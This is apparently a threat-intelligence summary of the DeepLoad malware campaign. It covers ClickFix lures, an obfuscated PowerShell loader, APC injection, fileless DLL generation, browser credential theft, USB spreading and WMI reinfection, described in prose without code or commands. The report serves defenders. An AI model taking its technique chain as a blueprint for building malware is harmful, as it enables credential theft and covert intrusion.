DeepLoad Malware
A newly identified attack campaign employs the ClickFix social engineering technique to initiate infection. Victims are manipulated into executing malicious PowerShell commands by pasting them into the Windows Run dialog under the guise of resolving a fabricated system issue. This initial step leverages mshta.exe, a legitimate Windows utility, to retrieve and execute an obfuscated PowerShell-based loader.
Table of Contents
Obfuscation Engineered for Evasion
The PowerShell loader conceals its true purpose through excessive and meaningless variable assignments, significantly complicating static analysis. Evidence suggests that artificial intelligence tools were likely used to construct this obfuscation layer, enhancing its sophistication. This approach enables the malware to bypass traditional detection mechanisms while maintaining operational integrity.
Stealth Through System Camouflage
DeepLoad is specifically designed to blend seamlessly into standard Windows operations. The payload is hidden within an executable named LockAppHost.exe, a legitimate process responsible for managing the Windows lock screen. To further obscure its presence, the malware disables PowerShell command history and directly invokes native Windows core functions instead of relying on standard PowerShell commands. This technique allows it to evade monitoring systems that track PowerShell activity.
Fileless Techniques and Dynamic Payload Generation
To minimize detection, DeepLoad avoids leaving consistent artifacts on disk. It dynamically generates a secondary component using PowerShell’s Add-Type feature, compiling C# code into a temporary DLL file stored in the user’s Temp directory. Each execution produces a uniquely named file, effectively bypassing file-based detection methods that rely on known signatures.
Advanced Injection for Covert Execution
A key evasion strategy involves the use of asynchronous procedure call (APC) injection. The malware launches a legitimate Windows process in a suspended state, injects shellcode directly into its memory, and resumes execution. This method ensures that the malicious payload runs within a trusted process without writing a decoded version to disk, significantly reducing its forensic footprint.
Persistent Credential Theft Mechanisms
DeepLoad is engineered to extract sensitive user data immediately upon execution. Its capabilities include:
- Harvesting stored browser passwords directly from the infected system
- Deploying a malicious browser extension that captures credentials in real time during login attempts and persists across sessions unless manually removed
Lateral Spread via Removable Media
The malware incorporates propagation techniques designed to exploit removable storage devices. Upon detecting USB drives or similar media, it copies malicious shortcut files disguised as legitimate installers. These files are named to appear trustworthy, increasing the likelihood of user interaction and further infection.
Silent Reinfection Through WMI Abuse
DeepLoad establishes persistence using Windows Management Instrumentation (WMI). It creates event subscriptions that trigger reinfection after a delay of three days, requiring no user interaction or attacker involvement. This technique also disrupts traditional detection models by breaking expected parent-child process relationships.
Strategic Objective: Full Kill Chain Coverage
The overall design of DeepLoad indicates a multi-functional malware framework capable of executing actions across the entire cyber kill chain. Its operational strategy focuses on:
- Avoiding disk-based artifacts to reduce detection opportunities
- Blending malicious activity within legitimate Windows processes
- Rapidly propagating across systems to expand its footprint
Indicators of a Scalable Threat Framework
The infrastructure and modular design associated with DeepLoad suggest the possibility of a shared or service-based deployment model. While characteristics are consistent with Malware-as-a-Service (MaaS) offerings, there is currently insufficient evidence to definitively confirm this classification.
